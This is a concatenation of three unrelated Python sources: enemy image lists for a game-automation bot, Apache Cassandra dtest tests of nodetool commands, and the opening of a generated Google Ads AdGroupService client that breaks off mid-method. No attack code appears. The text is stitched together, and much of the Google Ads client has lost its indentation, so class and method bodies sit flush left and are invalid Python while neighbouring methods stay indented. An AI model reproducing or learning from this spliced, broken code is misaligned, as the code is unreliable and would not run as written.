        "snake_green.png",
        "savage_red.png",
        "skeleton_null.png",
        "gargoyle_null.png",
        "bee_green.png",
        "bat_blue.png",
        "gargoyle_blue.png",
        "bat_green.png",
        "gargoyle_green.png",
        "gargoyle_red.png"
    ]
    armored = [
        "turtle_red.png",
        "armor_null.png",
        "armored_purple_null.png",
        "scorpion_null.png",
        "crab_red.png"
    ]
    strong = [
        "big_dog_green.png",
        "garm_blue.png",
        "big_dog_null.png",
        "garm_red.png",
        "reaper_null.png",
        "minotaur_blue_null.png",
        "reaper_red_null.png",
        "big_dog_red.png",
        "big_dog_blue.png",
        "garm_null.png",
        "liger_null.png"
    ]
    boss = [
        Pattern("boss_6_stage_1.png").similar(0.80),
        Pattern("boss_6_stage_2.png").similar(0.80),
        Pattern("boss_6_stage_3.png").similar(0.80),
        Pattern("boss_6_stage_4.png").similar(0.80)
    ]


class Map7(Map):
    # Map 7 enemy images.
    normal = [
        "snake_red.png",
        "snake_green.png",
        "chicken_red.png",
        "chicken_null.png",
        "crow_red.png",
        "crow_green.png",
        "savage_null.png",
        "savage_red.png",
        "skeleton_red.png",
        "crow_null.png",
        "wolf_blue.png",
        # NOTE(review): "wold_red.png" looks like a typo for "wolf_red.png" —
        # confirm the actual asset filename on disk before changing it.
        "wold_red.png"
    ]
    armored = [
        "scorpion_green.png",
        "scorpion_red.png",
        "scorpion_null.png",
        "turtle_null.png"
    ]
    strong = [
        "worm_null.png",
        "worm_red.png",
        "liger_red.png",
        "big_dog_null.png",
        "big_dog_red.png",
        "liger_null.png",
        "minotaur_blue_null.png",
        "minotaur_red_null.png"
    ]
    # Unlike maps 1-6, map 7 bosses are plain image names (no Pattern/similar).
    boss = [
        "stage_7_boss_1.png", "stage_7_boss_2.png", "stage_7_boss_3.png"
    ]
| |
import os
import pytest
import re
import logging
from cassandra import ConsistencyLevel
from cassandra.query import SimpleStatement
from ccmlib.node import ToolError
from dtest import Tester, create_ks
from tools.assertions import assert_all, assert_invalid, assert_none
from tools.jmxutils import JolokiaAgent, make_mbean, remove_perf_disable_shared_mem
# `since` gates tests to a minimum Cassandra version; the `since` mark is
# interpreted by the dtest pytest plugin.
since = pytest.mark.since
# Module-level logger (dtest convention).
logger = logging.getLogger(__name__)
class TestNodetool(Tester):
    """Functional tests for assorted `nodetool` subcommands."""

    def test_decommission_after_drain_is_invalid(self):
        """
        @jira_ticket CASSANDRA-8741

        Running a decommission after a drain should generate
        an unsupported operation message and exit with an error
        code (which we receive as a ToolError exception).
        """
        cluster = self.cluster
        cluster.populate([3]).start()

        node = cluster.nodelist()[0]
        node.drain(block_on_log=True)

        try:
            node.decommission()
            # (fix) was `assert not "Expected nodetool error"` — an obscure
            # always-failing assert; pytest.fail states the intent directly.
            pytest.fail("Expected nodetool error")
        except ToolError as e:
            assert '' == e.stderr
            assert 'Unsupported operation' in e.stdout

    def test_correct_dc_rack_in_nodetool_info(self):
        """
        @jira_ticket CASSANDRA-10382

        Test that nodetool info returns the correct rack and dc
        """
        cluster = self.cluster
        cluster.populate([2, 2])
        cluster.set_configuration_options(values={'endpoint_snitch': 'org.apache.cassandra.locator.GossipingPropertyFileSnitch'})

        # Write a rackdc properties file per node: dc from ccm, alternating racks.
        for i, node in enumerate(cluster.nodelist()):
            with open(os.path.join(node.get_conf_dir(), 'cassandra-rackdc.properties'), 'w') as snitch_file:
                for line in ["dc={}".format(node.data_center), "rack=rack{}".format(i % 2)]:
                    snitch_file.write(line + os.linesep)

        cluster.start(wait_for_binary_proto=True)

        for i, node in enumerate(cluster.nodelist()):
            out, err, _ = node.nodetool('info')
            assert 0 == len(err), err
            out_str = out
            if isinstance(out, (bytes, bytearray)):
                out_str = out.decode("utf-8")
            logger.debug(out_str)
            for line in out_str.split(os.linesep):
                if line.startswith('Data Center'):
                    assert line.endswith(node.data_center), \
                        "Expected dc {} for {} but got {}".format(node.data_center, node.address(), line.rsplit(None, 1)[-1])
                elif line.startswith('Rack'):
                    rack = "rack{}".format(i % 2)
                    assert line.endswith(rack), \
                        "Expected rack {} for {} but got {}".format(rack, node.address(), line.rsplit(None, 1)[-1])

    @since('3.4')
    def test_nodetool_timeout_commands(self):
        """
        @jira_ticket CASSANDRA-10953

        Test that nodetool gettimeout and settimeout work at a basic level
        """
        cluster = self.cluster
        cluster.populate([1]).start()
        node = cluster.nodelist()[0]

        types = ['read', 'range', 'write', 'counterwrite', 'cascontention',
                 'truncate', 'misc']
        if cluster.version() < '4.0':
            # streamingsocket timeout was removed in 4.0.
            types.append('streamingsocket')

        # read all of the timeouts, make sure we get a sane response
        for timeout_type in types:
            out, err, _ = node.nodetool('gettimeout {}'.format(timeout_type))
            assert 0 == len(err), err
            logger.debug(out)
            assert re.search(r'.* \d+ ms', out)

        # set all of the timeouts to 123
        for timeout_type in types:
            _, err, _ = node.nodetool('settimeout {} 123'.format(timeout_type))
            assert 0 == len(err), err

        # verify that they're all reported as 123
        for timeout_type in types:
            out, err, _ = node.nodetool('gettimeout {}'.format(timeout_type))
            assert 0 == len(err), err
            logger.debug(out)
            assert re.search(r'.* 123 ms', out)

    @since('3.0')
    def test_cleanup_when_no_replica_with_index(self):
        self._cleanup_when_no_replica(True)

    @since('3.0')
    def test_cleanup_when_no_replica_without_index(self):
        self._cleanup_when_no_replica(False)

    def _cleanup_when_no_replica(self, with_index=False):
        """
        @jira_ticket CASSANDRA-13526

        Test nodetool cleanup KS to remove old data when new replicas in current node instead of directly returning success.

        :param with_index: also create and verify a secondary index on the table.
        """
        self.cluster.populate([1, 1]).start(wait_for_binary_proto=True, wait_other_notice=True)

        node_dc1 = self.cluster.nodelist()[0]
        node_dc2 = self.cluster.nodelist()[1]

        # init schema with rf on both data centers
        replication_factor = {'dc1': 1, 'dc2': 1}
        session = self.patient_exclusive_cql_connection(node_dc1, consistency_level=ConsistencyLevel.ALL)
        session_dc2 = self.patient_exclusive_cql_connection(node_dc2, consistency_level=ConsistencyLevel.LOCAL_ONE)
        create_ks(session, 'ks', replication_factor)
        if self.cluster.version() < '4.0':
            # read_repair_chance options were removed in 4.0.
            session.execute('CREATE TABLE ks.cf (id int PRIMARY KEY, value text) with dclocal_read_repair_chance = 0 AND read_repair_chance = 0;', trace=False)
        else:
            session.execute('CREATE TABLE ks.cf (id int PRIMARY KEY, value text);', trace=False)
        if with_index:
            session.execute('CREATE INDEX value_by_key on ks.cf(value)', trace=False)

        # populate data
        for i in range(0, 100):
            session.execute(SimpleStatement("INSERT INTO ks.cf(id, value) VALUES({}, 'value');".format(i), consistency_level=ConsistencyLevel.ALL))

        # generate sstable
        self.cluster.flush()

        for node in self.cluster.nodelist():
            assert 0 != len(node.get_sstables('ks', 'cf'))
        if with_index:
            assert 100 == len(list(session_dc2.execute("SELECT * FROM ks.cf WHERE value = 'value'"))), 100

        # alter rf to only dc1
        session.execute("ALTER KEYSPACE ks WITH REPLICATION = {'class' : 'NetworkTopologyStrategy', 'dc1' : 1, 'dc2' : 0};")

        # nodetool cleanup on dc2
        node_dc2.nodetool("cleanup ks cf")
        node_dc2.nodetool("compact ks cf")

        # check local data on dc2: cleanup should have removed everything there
        for node in self.cluster.nodelist():
            if node.data_center == 'dc2':
                assert 0 == len(node.get_sstables('ks', 'cf'))
            else:
                assert 0 != len(node.get_sstables('ks', 'cf'))

        # dc1 data remains
        statement = SimpleStatement("SELECT * FROM ks.cf", consistency_level=ConsistencyLevel.LOCAL_ONE)
        assert 100 == len(list(session.execute(statement)))
        if with_index:
            statement = SimpleStatement("SELECT * FROM ks.cf WHERE value = 'value'", consistency_level=ConsistencyLevel.LOCAL_ONE)
            assert len(list(session.execute(statement))) == 100

        # alter rf back to query dc2, no data, no index
        session.execute("ALTER KEYSPACE ks WITH REPLICATION = {'class' : 'NetworkTopologyStrategy', 'dc1' : 0, 'dc2' : 1};")
        assert_none(session_dc2, "SELECT * FROM ks.cf")
        if with_index:
            assert_none(session_dc2, "SELECT * FROM ks.cf WHERE value = 'value'")

    def test_meaningless_notice_in_status(self):
        """
        @jira_ticket CASSANDRA-10176

        nodetool status don't return ownership when there is more than one user keyspace
        define (since they likely have different replication infos making ownership
        meaningless in general) and shows a helpful notice as to why it does that.
        This test checks that said notice is only printed is there is indeed more than
        one user keyspace.
        """
        cluster = self.cluster
        cluster.populate([3]).start()

        node = cluster.nodelist()[0]

        notice_message = r'effective ownership information is meaningless'

        # Do a first try without any keyspace, we shouldn't have the notice
        out, err, _ = node.nodetool('status')
        assert 0 == len(err), err
        assert not re.search(notice_message, out)

        session = self.patient_cql_connection(node)
        session.execute("CREATE KEYSPACE ks1 WITH replication = { 'class':'SimpleStrategy', 'replication_factor':1}")

        # With 1 keyspace, we should still not get the notice
        out, err, _ = node.nodetool('status')
        assert 0 == len(err), err
        assert not re.search(notice_message, out)

        session.execute("CREATE KEYSPACE ks2 WITH replication = { 'class':'SimpleStrategy', 'replication_factor':1}")

        # With 2 keyspaces with the same settings, we should not get the notice
        out, err, _ = node.nodetool('status')
        assert 0 == len(err), err
        assert not re.search(notice_message, out)

        session.execute("CREATE KEYSPACE ks3 WITH replication = { 'class':'SimpleStrategy', 'replication_factor':3}")

        # With a keyspace without the same replication factor, we should get the notice
        out, err, _ = node.nodetool('status')
        assert 0 == len(err), err
        assert re.search(notice_message, out)

    @since('4.0')
    def test_set_get_batchlog_replay_throttle(self):
        """
        @jira_ticket CASSANDRA-13614

        Test that batchlog replay throttle can be set and get through nodetool
        """
        cluster = self.cluster
        cluster.populate(2)
        node = cluster.nodelist()[0]
        cluster.start()

        # Test that nodetool help messages are displayed
        assert 'Set batchlog replay throttle' in node.nodetool('help setbatchlogreplaythrottle').stdout
        assert 'Print batchlog replay throttle' in node.nodetool('help getbatchlogreplaythrottle').stdout

        # Set and get throttle with nodetool, ensuring that the rate change is logged
        node.nodetool('setbatchlogreplaythrottle 2048')
        # (fix) was `>= 0`, which is vacuously true for any len(); the comment
        # above says the log line must actually be present.
        assert len(node.grep_log('Updating batchlog replay throttle to 2048 KB/s, 1024 KB/s per endpoint',
                                 filename='debug.log')) > 0
        assert 'Batchlog replay throttle: 2048 KB/s' in node.nodetool('getbatchlogreplaythrottle').stdout

    @since('3.0')
    def test_reloadlocalschema(self):
        """
        @jira_ticket CASSANDRA-13954

        Test that `nodetool reloadlocalschema` works as intended
        """
        cluster = self.cluster
        cluster.populate(1)
        node = cluster.nodelist()[0]
        remove_perf_disable_shared_mem(node)  # for jmx
        cluster.start()

        session = self.patient_cql_connection(node)

        query = "CREATE KEYSPACE IF NOT EXISTS test WITH replication " \
                "= {'class': 'NetworkTopologyStrategy', 'datacenter1': 2};"
        session.execute(query)

        query = 'CREATE TABLE test.test (pk int, ck int, PRIMARY KEY (pk, ck));'
        session.execute(query)

        ss = make_mbean('db', type='StorageService')

        # get initial schema version
        with JolokiaAgent(node) as jmx:
            schema_version = jmx.read_attribute(ss, 'SchemaVersion')

        # manually add a regular column 'val' to test.test
        query = """
            INSERT INTO system_schema.columns
                (keyspace_name, table_name, column_name, clustering_order,
                 column_name_bytes, kind, position, type)
            VALUES
                ('test', 'test', 'val', 'none',
                 0x76616c, 'regular', -1, 'int');"""
        session.execute(query)

        # validate that schema version wasn't automatically updated
        with JolokiaAgent(node) as jmx:
            assert schema_version == jmx.read_attribute(ss, 'SchemaVersion')

        # make sure the new column wasn't automagically picked up
        assert_invalid(session, 'INSERT INTO test.test (pk, ck, val) VALUES (0, 1, 2);')

        # force the node to reload schema from disk
        node.nodetool('reloadlocalschema')

        # validate that schema version changed
        with JolokiaAgent(node) as jmx:
            assert schema_version != jmx.read_attribute(ss, 'SchemaVersion')

        # try an insert with the new column again and validate it succeeds this time
        session.execute('INSERT INTO test.test (pk, ck, val) VALUES (0, 1, 2);')
        assert_all(session, 'SELECT pk, ck, val FROM test.test;', [[0, 1, 2]])

    @since('3.0')
    def test_refresh_size_estimates_clears_invalid_entries(self):
        """
        @jira_ticket CASSANDRA-14905

        nodetool refreshsizeestimates should clear up entries for tables that no longer exist
        """
        cluster = self.cluster
        cluster.populate(1)
        node = cluster.nodelist()[0]
        cluster.start()
        session = self.patient_exclusive_cql_connection(node)
        session.execute("USE system;")
        # Valid keyspace but invalid table
        session.execute("INSERT INTO size_estimates (keyspace_name, table_name, range_start, range_end, mean_partition_size, partitions_count) VALUES ('system_auth', 'bad_table', '-5', '5', 0, 0);")
        # Invalid keyspace and table
        session.execute("INSERT INTO size_estimates (keyspace_name, table_name, range_start, range_end, mean_partition_size, partitions_count) VALUES ('bad_keyspace', 'bad_table', '-5', '5', 0, 0);")
        node.nodetool('refreshsizeestimates')
        assert_none(session, "SELECT * FROM size_estimates WHERE keyspace_name='system_auth' AND table_name='bad_table'")
        assert_none(session, "SELECT * FROM size_estimates WHERE keyspace_name='bad_keyspace'")

    @since('4.0')
    def test_set_get_concurrent_view_builders(self):
        """
        @jira_ticket CASSANDRA-12245

        Test that the number of concurrent view builders can be set and get through nodetool
        """
        cluster = self.cluster
        cluster.populate(2)
        node = cluster.nodelist()[0]
        cluster.start()

        # Test that nodetool help messages are displayed
        assert 'Set the number of concurrent view' in node.nodetool('help setconcurrentviewbuilders').stdout
        assert 'Get the number of concurrent view' in node.nodetool('help getconcurrentviewbuilders').stdout

        # Set and get throttle with nodetool, ensuring that the rate change is logged
        node.nodetool('setconcurrentviewbuilders 4')
        assert 'Current number of concurrent view builders in the system is: \n4' \
               in node.nodetool('getconcurrentviewbuilders').stdout

        # Try to set an invalid zero value
        try:
            node.nodetool('setconcurrentviewbuilders 0')
        except ToolError as e:
            # (fix) a second check here — `assert '...', e.message` — was a
            # constant-true assertion on a non-empty string literal and has
            # been removed; the real contract is the server error in stdout.
            assert 'concurrent_view_builders should be great than 0.' in e.stdout
        else:
            # (fix) was `self.fail(...)` (unittest API) with a typo'd message.
            pytest.fail("Expected error when setting an invalid value")

    @since('4.0')
    def test_describecluster_more_information_three_datacenters(self):
        """
        nodetool describecluster should be more informative. It should include detailes
        for total node count, list of datacenters, RF, number of nodes per dc, how many
        are down and version(s).

        @jira_ticket CASSANDRA-13853
        @expected_result This test invokes nodetool describecluster and matches the output with the expected one
        """
        cluster = self.cluster
        cluster.populate([1, 2, 1]).start(wait_for_binary_proto=True)

        node1_dc1, node1_dc2, node2_dc2, node1_dc3 = cluster.nodelist()

        session_dc1 = self.patient_cql_connection(node1_dc1)
        session_dc1.execute("create KEYSPACE ks1 WITH replication = {'class': 'NetworkTopologyStrategy', 'dc1': 3, 'dc2':5, 'dc3':1}")
        session_dc3 = self.patient_cql_connection(node1_dc3)
        session_dc3.execute("create KEYSPACE ks2 WITH replication = {'class': 'NetworkTopologyStrategy', 'dc1': 3, 'dc2':5, 'dc3':1}")

        # Every node must report the same (sorted) describecluster output.
        all_nodes = cluster.nodelist()
        out_node1_dc1, node1_dc1_sorted = self._describe(all_nodes.pop())
        for node in all_nodes:
            out, out_sorted = self._describe(node)
            assert node1_dc1_sorted == out_sorted

        logger.debug(out_node1_dc1)
        assert 'Live: 4' in out_node1_dc1
        assert 'Joining: 0' in out_node1_dc1
        assert 'Moving: 0' in out_node1_dc1
        assert 'Leaving: 0' in out_node1_dc1
        assert 'Unreachable: 0' in out_node1_dc1
        assert 'Data Centers:' in out_node1_dc1
        assert 'dc1 #Nodes: 1 #Down: 0' in out_node1_dc1
        assert 'dc2 #Nodes: 2 #Down: 0' in out_node1_dc1
        assert 'dc3 #Nodes: 1 #Down: 0' in out_node1_dc1
        assert 'Keyspaces:' in out_node1_dc1

        expected_keyspaces = [('system_schema', 'LocalStrategy', {''}),
                              ('system', 'LocalStrategy', {''}),
                              ('system_traces', 'SimpleStrategy', {'replication_factor=2'}),
                              ('system_distributed', 'SimpleStrategy', {'replication_factor=3'}),
                              ('system_auth', 'SimpleStrategy', {'replication_factor=1'}),
                              ('ks1', 'NetworkTopologyStrategy', {'dc1=3', 'dc2=5', 'dc3=1'}),
                              ('ks2', 'NetworkTopologyStrategy', {'dc1=3', 'dc2=5', 'dc3=1'})]
        for (ks, strategy, _) in expected_keyspaces:
            assert "{} -> Replication class: {}".format(ks, strategy) in out_node1_dc1  # replication factor is verified below

        # now check db versions & replication factor:
        # Database versions:
        #        4.0.0: [127.0.0.6:7000, 127.0.0.5:7000, 127.0.0.4:7000, 127.0.0.3:7000, 127.0.0.2:7000, 127.0.0.1:7000]
        lines = out_node1_dc1.splitlines()
        rex = r'(\S+)\s\[(.*)\]'
        found_keyspaces = False
        found_database = False
        verified_rfs = 0
        for i in range(0, len(lines)):
            if 'Keyspaces' in lines[i]:
                found_keyspaces = True
                for x in range(i + 1, len(lines)):
                    for (ks, strategy, replication) in expected_keyspaces:
                        if "{} ->".format(ks) in lines[x]:
                            verified_rfs += 1
                            assert strategy in lines[x]
                            assert replication == self._get_replication(lines[x])
            if 'Database versions:' in lines[i]:
                found_database = True
                m = re.search(rex, lines[i + 1])
                # group(1) is the version, and all nodes are on the same version
                assert "{}".format(node1_dc1.get_cassandra_version()) in m.group(1)
                nodestring = m.group(2)
                for n in cluster.nodelist():
                    assert n.address_and_port() in nodestring
        assert found_keyspaces
        assert found_database
        assert verified_rfs == len(expected_keyspaces)

    def _get_replication(self, line):
        """Extract the replication options of one describecluster keyspace line
        as a set of 'key=value' strings.

        e.g. ks1 -> Replication class: NetworkTopologyStrategy {dc2=5, dc1=3, dc3=1}
        """
        repl_rex = r'{(.*)}'
        repl_m = re.search(repl_rex, line)
        return {x.strip() for x in repl_m.group(1).split(",")}

    def _describe(self, node):
        """Run `nodetool describecluster` on `node`; return (raw output, sorted tokens)."""
        node_describe, err, _ = node.nodetool('describecluster')
        assert 0 == len(err), err
        out_sorted = node_describe.split()
        out_sorted.sort()
        return (node_describe, out_sorted)
| |
# -*- coding: utf-8 -*-
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from collections import OrderedDict
import os
import re
from typing import Dict, Optional, Sequence, Tuple, Type, Union
from google.api_core import client_options as client_options_lib
from google.api_core import gapic_v1
from google.api_core import retry as retries
from google.auth import credentials as ga_credentials # type: ignore
from google.auth.transport import mtls # type: ignore
from google.auth.transport.grpc import SslCredentials # type: ignore
from google.auth.exceptions import MutualTLSChannelError # type: ignore
from google.oauth2 import service_account # type: ignore
# `_MethodDefault` exists only in newer google-api-core releases; on older
# versions fall back to a plain `object` sentinel in the union.
try:
    OptionalRetry = Union[retries.Retry, gapic_v1.method._MethodDefault]
except AttributeError:  # pragma: NO COVER
    OptionalRetry = Union[retries.Retry, object]  # type: ignore
from google.ads.googleads.v9.resources.types import ad_group
from google.ads.googleads.v9.services.types import ad_group_service
from google.rpc import status_pb2 # type: ignore
from .transports.base import AdGroupServiceTransport, DEFAULT_CLIENT_INFO
from .transports.grpc import AdGroupServiceGrpcTransport
class AdGroupServiceClientMeta(type):
    """Metaclass for the AdGroupService client.

    This provides class-level methods for building and retrieving
    support objects (e.g. transport) without polluting the client instance
    objects.
    """

    # Registry of transport name -> transport class; insertion order defines
    # the default (first) transport.
    _transport_registry = (
        OrderedDict()
    )  # type: Dict[str, Type[AdGroupServiceTransport]]
    _transport_registry["grpc"] = AdGroupServiceGrpcTransport

    def get_transport_class(
        cls, label: Optional[str] = None,
    ) -> Type[AdGroupServiceTransport]:
        """Return an appropriate transport class.

        Args:
            label: The name of the desired transport. If none is
                provided, then the first transport in the registry is used.

        Returns:
            The transport class to use.
        """
        # If a specific transport is requested, return that one.
        # (fix) annotation was the implicit-Optional `label: str = None`,
        # which is invalid per PEP 484; now `Optional[str]`.
        if label:
            return cls._transport_registry[label]

        # No transport is requested; return the default (that is, the first one
        # in the dictionary).
        return next(iter(cls._transport_registry.values()))
class AdGroupServiceClient(metaclass=AdGroupServiceClientMeta):
"""Service to manage ad groups."""
@staticmethod
def _get_default_mtls_endpoint(api_endpoint):
"""Convert api endpoint to mTLS endpoint.
Convert "*.sandbox.googleapis.com" and "*.googleapis.com" to
"*.mtls.sandbox.googleapis.com" and "*.mtls.googleapis.com" respectively.
Args:
api_endpoint (Optional[str]): the api endpoint to convert.
Returns:
str: converted mTLS api endpoint.
"""
if not api_endpoint:
return api_endpoint
mtls_endpoint_re = re.compile(
r"(?P<name>[^.]+)(?P<mtls>\.mtls)?(?P<sandbox>\.sandbox)?(?P<googledomain>\.googleapis\.com)?"
)
m = mtls_endpoint_re.match(api_endpoint)
name, mtls, sandbox, googledomain = m.groups()
if mtls or not googledomain:
return api_endpoint
if sandbox:
return api_endpoint.replace(
"sandbox.googleapis.com", "mtls.sandbox.googleapis.com"
)
return api_endpoint.replace(".googleapis.com", ".mtls.googleapis.com")
DEFAULT_ENDPOINT = "googleads.googleapis.com"
DEFAULT_MTLS_ENDPOINT = _get_default_mtls_endpoint.__func__( # type: ignore
DEFAULT_ENDPOINT
)
@classmethod
def from_service_account_info(cls, info: dict, *args, **kwargs):
"""Creates an instance of this client using the provided credentials info.
Args:
info (dict): The service account private key info.
args: Additional arguments to pass to the constructor.
kwargs: Additional arguments to pass to the constructor.
Returns:
AdGroupServiceClient: The constructed client.
"""
credentials = service_account.Credentials.from_service_account_info(
info
)
kwargs["credentials"] = credentials
return cls(*args, **kwargs)
@classmethod
def from_service_account_file(cls, filename: str, *args, **kwargs):
"""Creates an instance of this client using the provided credentials
file.
Args:
filename (str): The path to the service account private key json
file.
args: Additional arguments to pass to the constructor.
kwargs: Additional arguments to pass to the constructor.
Returns:
AdGroupServiceClient: The constructed client.
"""
credentials = service_account.Credentials.from_service_account_file(
filename
)
kwargs["credentials"] = credentials
return cls(*args, **kwargs)
from_service_account_json = from_service_account_file
    @property
    def transport(self) -> AdGroupServiceTransport:
        """Return the transport used by the client instance.

        Returns:
            AdGroupServiceTransport: The transport used by the client instance.
        """
        # _transport is always assigned in __init__.
        return self._transport
    def __enter__(self):
        """Enter the runtime context; the client itself is the context value."""
        return self

    # NOTE: parameter is named `type` (shadows the builtin) to match the
    # context-manager dunder convention; kept for call compatibility.
    def __exit__(self, type, value, traceback):
        """Releases underlying transport's resources.

        .. warning::
            ONLY use as a context manager if the transport is NOT shared
            with other clients! Exiting the with block will CLOSE the transport
            and may cause errors in other clients!
        """
        self.transport.close()
@staticmethod
def ad_group_path(customer_id: str, ad_group_id: str,) -> str:
"""Return a fully-qualified ad_group string."""
return "customers/{customer_id}/adGroups/{ad_group_id}".format(
customer_id=customer_id, ad_group_id=ad_group_id,
)
@staticmethod
def parse_ad_group_path(path: str) -> Dict[str, str]:
"""Parse a ad_group path into its component segments."""
m = re.match(
r"^customers/(?P<customer_id>.+?)/adGroups/(?P<ad_group_id>.+?)$",
path,
)
return m.groupdict() if m else {}
@staticmethod
def ad_group_label_path(
customer_id: str, ad_group_id: str, label_id: str,
) -> str:
"""Return a fully-qualified ad_group_label string."""
return "customers/{customer_id}/adGroupLabels/{ad_group_id}~{label_id}".format(
customer_id=customer_id, ad_group_id=ad_group_id, label_id=label_id,
)
@staticmethod
def parse_ad_group_label_path(path: str) -> Dict[str, str]:
"""Parse a ad_group_label path into its component segments."""
m = re.match(
r"^customers/(?P<customer_id>.+?)/adGroupLabels/(?P<ad_group_id>.+?)~(?P<label_id>.+?)$",
path,
)
return m.groupdict() if m else {}
@staticmethod
def campaign_path(customer_id: str, campaign_id: str,) -> str:
"""Return a fully-qualified campaign string."""
return "customers/{customer_id}/campaigns/{campaign_id}".format(
customer_id=customer_id, campaign_id=campaign_id,
)
@staticmethod
def parse_campaign_path(path: str) -> Dict[str, str]:
"""Parse a campaign path into its component segments."""
m = re.match(
r"^customers/(?P<customer_id>.+?)/campaigns/(?P<campaign_id>.+?)$",
path,
)
return m.groupdict() if m else {}
@staticmethod
def common_billing_account_path(billing_account: str,) -> str:
"""Return a fully-qualified billing_account string."""
return "billingAccounts/{billing_account}".format(
billing_account=billing_account,
)
@staticmethod
def parse_common_billing_account_path(path: str) -> Dict[str, str]:
"""Parse a billing_account path into its component segments."""
m = re.match(r"^billingAccounts/(?P<billing_account>.+?)$", path)
return m.groupdict() if m else {}
@staticmethod
def common_folder_path(folder: str,) -> str:
"""Return a fully-qualified folder string."""
return "folders/{folder}".format(folder=folder,)
@staticmethod
def parse_common_folder_path(path: str) -> Dict[str, str]:
"""Parse a folder path into its component segments."""
m = re.match(r"^folders/(?P<folder>.+?)$", path)
return m.groupdict() if m else {}
@staticmethod
def common_organization_path(organization: str,) -> str:
"""Return a fully-qualified organization string."""
return "organizations/{organization}".format(organization=organization,)
@staticmethod
def parse_common_organization_path(path: str) -> Dict[str, str]:
"""Parse a organization path into its component segments."""
m = re.match(r"^organizations/(?P<organization>.+?)$", path)
return m.groupdict() if m else {}
@staticmethod
def common_project_path(project: str,) -> str:
"""Return a fully-qualified project string."""
return "projects/{project}".format(project=project,)
@staticmethod
def parse_common_project_path(path: str) -> Dict[str, str]:
"""Parse a project path into its component segments."""
m = re.match(r"^projects/(?P<project>.+?)$", path)
return m.groupdict() if m else {}
@staticmethod
def common_location_path(project: str, location: str,) -> str:
"""Return a fully-qualified location string."""
return "projects/{project}/locations/{location}".format(
project=project, location=location,
)
@staticmethod
def parse_common_location_path(path: str) -> Dict[str, str]:
"""Parse a location path into its component segments."""
m = re.match(
r"^projects/(?P<project>.+?)/locations/(?P<location>.+?)$", path
)
return m.groupdict() if m else {}
    def __init__(
        self,
        *,
        credentials: Optional[ga_credentials.Credentials] = None,
        transport: Union[str, AdGroupServiceTransport, None] = None,
        client_options: Optional[client_options_lib.ClientOptions] = None,
        client_info: gapic_v1.client_info.ClientInfo = DEFAULT_CLIENT_INFO,
    ) -> None:
        """Instantiate the ad group service client.

        Args:
            credentials (Optional[google.auth.credentials.Credentials]): The
                authorization credentials to attach to requests. These
                credentials identify the application to the service; if none
                are specified, the client will attempt to ascertain the
                credentials from the environment.
            transport (Union[str, ~.AdGroupServiceTransport]): The
                transport to use. If set to None, a transport is chosen
                automatically.
            client_options (google.api_core.client_options.ClientOptions): Custom options for the
                client. It won't take effect if a ``transport`` instance is provided.
                (1) The ``api_endpoint`` property can be used to override the
                default endpoint provided by the client. GOOGLE_API_USE_MTLS_ENDPOINT
                environment variable can also be used to override the endpoint:
                "always" (always use the default mTLS endpoint), "never" (always
                use the default regular endpoint) and "auto" (auto switch to the
                default mTLS endpoint if client certificate is present, this is
                the default value). However, the ``api_endpoint`` property takes
                precedence if provided.
                (2) If GOOGLE_API_USE_CLIENT_CERTIFICATE environment variable
                is "true", then the ``client_cert_source`` property can be used
                to provide client certificate for mutual TLS transport. If
                not provided, the default SSL client certificate will be used if
                present. If GOOGLE_API_USE_CLIENT_CERTIFICATE is "false" or not
                set, no client certificate will be used.
            client_info (google.api_core.gapic_v1.client_info.ClientInfo):
                The client info used to send a user-agent string along with
                API requests. If ``None``, then default info will be used.
                Generally, you only need to set this if you're developing
                your own client library.

        Raises:
            google.auth.exceptions.MutualTLSChannelError: If mutual TLS transport
                creation failed for any reason.
        """
        # Normalize client_options: accept a plain dict or None.
        if isinstance(client_options, dict):
            client_options = client_options_lib.from_dict(client_options)
        if client_options is None:
            client_options = client_options_lib.ClientOptions()

        # Create SSL credentials for mutual TLS if needed.
        if os.getenv("GOOGLE_API_USE_CLIENT_CERTIFICATE", "false") not in (
            "true",
            "false",
        ):
            raise ValueError(
                "Environment variable `GOOGLE_API_USE_CLIENT_CERTIFICATE` must be either `true` or `false`"
            )

        use_client_cert = (
            os.getenv("GOOGLE_API_USE_CLIENT_CERTIFICATE", "false") == "true"
        )

        ssl_credentials = None
        is_mtls = False
        if use_client_cert:
            if client_options.client_cert_source:
                # Caller supplied an explicit client certificate source.
                import grpc  # type: ignore

                cert, key = client_options.client_cert_source()
                ssl_credentials = grpc.ssl_channel_credentials(
                    certificate_chain=cert, private_key=key
                )
                is_mtls = True
            else:
                # Fall back to the default SSL client certificate, if any.
                creds = SslCredentials()
                is_mtls = creds.is_mtls
                ssl_credentials = creds.ssl_credentials if is_mtls else None

        # Figure out which api endpoint to use.
        # Explicit client_options.api_endpoint wins over the env var.
        if client_options.api_endpoint is not None:
            api_endpoint = client_options.api_endpoint
        else:
            use_mtls_env = os.getenv("GOOGLE_API_USE_MTLS_ENDPOINT", "auto")
            if use_mtls_env == "never":
                api_endpoint = self.DEFAULT_ENDPOINT
            elif use_mtls_env == "always":
                api_endpoint = self.DEFAULT_MTLS_ENDPOINT
            elif use_mtls_env == "auto":
                api_endpoint = (
                    self.DEFAULT_MTLS_ENDPOINT
                    if is_mtls
                    else self.DEFAULT_ENDPOINT
                )
            else:
                raise MutualTLSChannelError(
                    "Unsupported GOOGLE_API_USE_MTLS_ENDPOINT value. Accepted values: never, auto, always"
                )

        # Save or instantiate the transport.
        # Ordinarily, we provide the transport, but allowing a custom transport
        # instance provides an extensibility point for unusual situations.
        if isinstance(transport, AdGroupServiceTransport):
            # transport is a AdGroupServiceTransport instance.
            if credentials:
                raise ValueError(
                    "When providing a transport instance, "
                    "provide its credentials directly."
                )
            self._transport = transport
        elif isinstance(transport, str):
            # transport given by name; look it up via the metaclass registry.
            Transport = type(self).get_transport_class(transport)
            self._transport = Transport(
                credentials=credentials, host=self.DEFAULT_ENDPOINT
            )
        else:
            # Default: build a gRPC transport against the resolved endpoint.
            self._transport = AdGroupServiceGrpcTransport(
                credentials=credentials,
                host=api_endpoint,
                ssl_channel_credentials=ssl_credentials,
                client_info=client_info,
            )
def get_ad_group(
    self,
